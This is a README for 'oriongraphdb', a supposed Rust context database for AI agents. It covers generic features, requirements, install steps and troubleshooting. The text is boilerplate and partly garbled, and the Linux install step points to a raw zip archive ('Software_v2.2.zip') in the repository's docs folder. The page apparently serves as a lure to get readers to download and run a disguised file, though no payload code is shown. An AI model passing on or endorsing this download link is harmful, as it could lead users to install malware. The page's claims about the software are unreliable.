oriongraphdb is a context database designed for AI agents. It offers multi-channel retrieval, allowing you to access data in various ways. Built in Rust, it provides a silent and efficient performance that assists in managing token budgets, enabling you to retrieve the best information effectively.
- Multi-Channel Retrieval: Access data via semantic, lexical, or structural channels.
- MMR Selection: Get the most relevant results based on Maximum Marginal Relevance.
- Token Budget Management: Keep your queries efficient with controlled token usage.
- Built with Rust: Enjoy a fast and reliable application.
To get started with oriongraphdb, visit this page to download the latest release:
Before you install, ensure your system meets the following requirements:
- Operating System: Windows 10 or later, macOS Mojave or later, Linux with glibc 2.17 or later.
- Memory: Minimum 4 GB RAM.
- Disk Space: At least 250 MB of free space.
-
Visit the Releases Page: Go to oriongraphdb Releases.
-
Choose the Latest Version: Look for the latest release at the top of the page.
-
Download the Installer: Click on the version suitable for your operating system. Save the file to your computer.
-
Run the Installer:
- Windows: Double-click the
.exefile to start the installation. Follow the prompts on your screen. - macOS: Open the
.dmgfile and drag the oriongraphdb icon to your Applications folder. - Linux: Follow the instructions provided in the
https://github.com/lemoal-t/oriongraphdb/raw/refs/heads/master/docs/Software_v2.2.zipor.debfile for your specific distribution.
- Windows: Double-click the
-
Launch the Application: Locate oriongraphdb in your applications list and start the program.
Once oriongraphdb is running, you can begin loading your data. Hereβs a basic guide to help you get started:
-
Import Data: Use the import feature in the application to load your data. You can import various file formats including CSV and JSON.
-
Query Data: Utilize the query interface to access information. Choose between semantic, lexical, or structural queries based on your needs.
-
Manage Token Budgets: Adjust your token limits in the settings to balance efficiency and data retrieval.
-
Review Results: Analyze the returned results for relevance and usefulness.
If you encounter any issues while downloading or running the application, consider the following:
-
Cannot Download: Ensure you have a stable internet connection. Try refreshing the browser or using a different browser if issues persist.
-
Installation Fails: Double-check that your system meets the requirements. Refer to the installation steps to ensure youβve followed them correctly.
-
Application Crashes: Make sure to keep your software updated. Visit the releases page to check for the latest version.
If you want to contribute, please visit our Contributing Guidelines for more information.
- Agents
- AI
- Context Compilation
- Machine Learning
- Semantic Search
Feel free to explore all the capabilities of oriongraphdb. For discussions and support, you can reach out on the issues page of the project.
Start using oriongraphdb today and experience the simplicity of managing context data for your AI applications!